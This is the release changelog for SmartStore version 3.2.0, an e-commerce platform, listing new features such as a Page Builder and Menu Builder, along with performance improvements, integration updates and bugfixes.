Saturday, May 11, 2019
SmartStore version 3.2.0
Highlights
- (NEW) Page Builder: Create fascinating content that will boost your sales. No coding is required thanks to a powerful WYSIWYG editor which utilizes the revolutionary CSS Grid system (commercial plugin)
- (NEW) Menu Builder: Visual manager for all sorts of menus. Change existing menus or create your own and place them anywhere you want.
- (Perf) Faster MegaSearch thanks to Lucene.NET 4.8
- (Perf) Huge performance increase in discount resolution and calculation.
New Features
- EmailReminder:
  - Reminders for open shopping carts
  - Reminders for product reviews
  - Reminders to visit the shop after a long absence
- Scheduling
  - Task execution history
  - Web farms: tasks can run decidedly on each machine of a web farm
- #1144 MegaSearch: multi server search index
- Topics & Pages
  - Access control lists
  - Grid paging & filtering
  - New properties: added IsPublished, Short Title (link text) and Intro (teaser) properties.
  - #1542: added options to set body CSS class and Html Id.
- MegaSearch:
  - Supports searching for forum posts.
  - #1172 Option to display related search terms on search page.
  - Command to continue a previously aborted search index rebuild.
- Import/export of:
  - Product tags
  - Tier prices
  - Product attribute options
  - Product attribute combinations (update only)
- Forum:
  - Added option to display a captcha on forum pages when creating or replying to a topic.
  - #417 Restrict forum groups to specific customer roles.
  - Added published property to forum topic and post.
  - Added voting for forum posts.
  - Several performance improvements.
- BeezUp:
  - #1459 Add option to only submit one category name per product
  - Allow to specify export categories per product
- Santander:
  - Added payment method for instalment purchase.
  - Added financing calculator.
- Updated icon library to Font Awesome 5 Free with the possibility to activate pro version in the frontend.
- New storefront catalog options: ShowSubCategoriesInSubPages, ShowDescriptionInSubPages & IncludeFeaturedProductsInSubPages (Subpage = List index > 1 or any active filter).
- New security option: Use invisible reCAPTCHA
- Wallet: Allow customer to choose whether refund should be submitted to his wallet.
- Added option to display preview pictures in product lists
- Added option to add multiple file versions to product download section
- Added options for alternating price display (in badges)
- Customer avatar: Letter with colored background if no avatar image was uploaded.
- Viveum: Supports payment via "Virtual Account Brands" (e.g. PayPal).
- #1515 Poll: Add result tab with a list of answers and customers for a poll
- BMEcat: Added export and import of product tags.
- Web-API: Added endpoints for ProductSpecificationAttribute.
- Trusted Shops: Added new Trustbadge display for mobile devices
- (Dev) Added sm:EfCommandTimeout setting to web.config (was 30 sec. fixed, now configurable)
Improvements
- (Perf) Significantly increased query performance for products with a lot of category assignments (> 10).
- (Perf) Increased app startup speed by up to 20%.
- (Perf) Ultra-fast file-based XML sitemap generation for extremely large catalogs (> 1M)
  - At least 10x faster
  - Generated files are saved on the hard disk now: a rebuild after an app restart is no longer necessary.
  - No exclusive locks during rebuilds anymore: if an (outdated) file already exists, it is returned instantly.
- (Dev) Enhanced pub/sub: new IConsumer marker interface for classes that contain one or more event message handlers. The generic IConsumer<T> implements IConsumer but has been marked as Obsolete.
- Better protection against XSS attacks
- Updated to Bootstrap version 4.1.3
- Debitoor:
- #1479 Show in messages the delivery time at the time of purchase
- #1184 Sort current shopping carts & current wishlists by ShoppingCartItem.CreatedOn.
- #1106 BMECat: import & export support for product keywords
- #1499 Added hint to forms indicating that fields with an asterisk (*) are required
- Added filter for newsletter subscriber export by working language
- Refactored download section
- Enhanced EntityPicker to pick from customers, manufacturers & categories
- #1510 Breadcrumb of an associated product should include the grouped product if it has no assigned categories.
- OpenTrans: added customer number to parties
- Do not filter cookie using resources if cookie usage has not yet been consented to.
- #1563 QueuedMessagesClearTask: add a setting for the age of the mails to be deleted.
- #1569 Added a setting to show login note if no prices are displayed due to customer group permissions.
- PayPal PLUS: Up to 10 more third party payment methods are allowed by PayPal now.
- #1560 Tell-a-Friend and anonymous user: render alert box and tell guest to login to use this function
- #1571 Compare products now shows all specification attribute options
- #1539 Signing in is now allowed with e-mail and username
- Trusted Shops: Trustbadge won't be displayed in Popups & Iframes anymore
- #1461 Admin Grid: filter dialog will be displayed entirely even when grid has no data to display
- Lots of minor enhancements for both frontend and admin theme
- Many other minor improvements
Bugfixes
- In a multi-store environment, multiple topics with the same system name can now be resolved reliably.
- GMC:
  - Export the product images if no attribute images are defined
  - Do not export the first image twice for additional images
  - Export image URL of full size image (not default size) for additional images
  - Custom labels are now being exported
- Media middleware: 0-byte files should be treated as missing.
- Megamenu alpha/omega blends do now toggle correctly on touch devices
- Summernote HTML editor exceeds parent container width when CodeMirror is activated
- Only display a zero search hits warning if at least one filter is activated
- #1436 Do not display delivery time in customer order completed messages
- "ArgumentNullException: The value must not be NULL" if a topic is password protected
- Tax by region: Fixed the country column showing "Unavailable" after inserting a tax rate
- #1014 Switching to default language keeps specific URL alias of current page
- Shipping by total: When inserting a record the country now will be saved
- #1460 Editing of the customer title was missing on customer and address pages in the backend
- #1447 Checkout button payment methods (Amazon, PayPal Express) won't work in conjunction with mandatory checkout attributes
- Fixed Autofac circularity error
- When creating a topic, the widget zone input showed System.String[]
- Switching the language always redirected to the home page if SEO friendly URLs was deactivated.
- File upload of a checkout attribute was not stored on cart page.
- Redirecting within checkout may have displayed an incorrect URL in the browser.
- Server cannot modify cookies after HTTP headers have been sent.
- Wrong base price on product and cart page when a special price is active.
- In a multi-store, message templates may have loaded the wrong disclaimer and conditions-of-use text.
- NullReferenceException in manufacturer list when there is no manufacturer.
- Wrong order of featured products on category page.
- #1504 Cart item price calculation was wrong if attribute combinations with text types were involved.
- #1485 Dropdown list for product sorting didn't work with Internet Explorer 11.
- #1468 Twitter authentication wasn't working anymore.
- Newsletter subscription didn't work when customer privacy setting DisplayGdprConsentOnForms was turned off
- Fixed social media image detection
- Fixed redirection of bots when several languages were active
- Region cannot be selected in checkout when entering a billing or shipping address
- Fixed invalid conversion of "System.Int32" to "SmartStore.Core.Domain.Tax.VatNumberStatus" when placing an order
- MegaMenu: Improved item rendering for third tier elements
- Product display order on category and manufacturer pages was sometimes wrong when using linq search.
- Debitoor: Wrong invoice total if a subtotal discount has been applied.
- Import: Fixes invalid conversion "System.Double" to "SmartStore.Core.Domain.Catalog.QuantityControlType".
- Topics: Fixes "Cannot insert duplicate key row in object 'dbo.UrlRecord' with unique index 'IX_UrlRecord_Slug'".
- #1566 Santander: eliminate the 1 cent rounding difference at amountTotalNet.
- Fixed redirection to the homepage for pages which are loaded while the application is restarted.
- #1570 Filter option "Only deactivated customers" filters deleted instead of deactivated customers.
- #1475 select boxes must be wrapped on mobile devices if data-select-url is set
- Fixed the redirection to the homepage for pages which were loaded while the application was restarted
- Fixed base price formatting for product feeds, which expect a different format.
- #1369 Shopping cart shows "Discount code applied", although it is not applied due to a lower tier price.
- Many other fixes...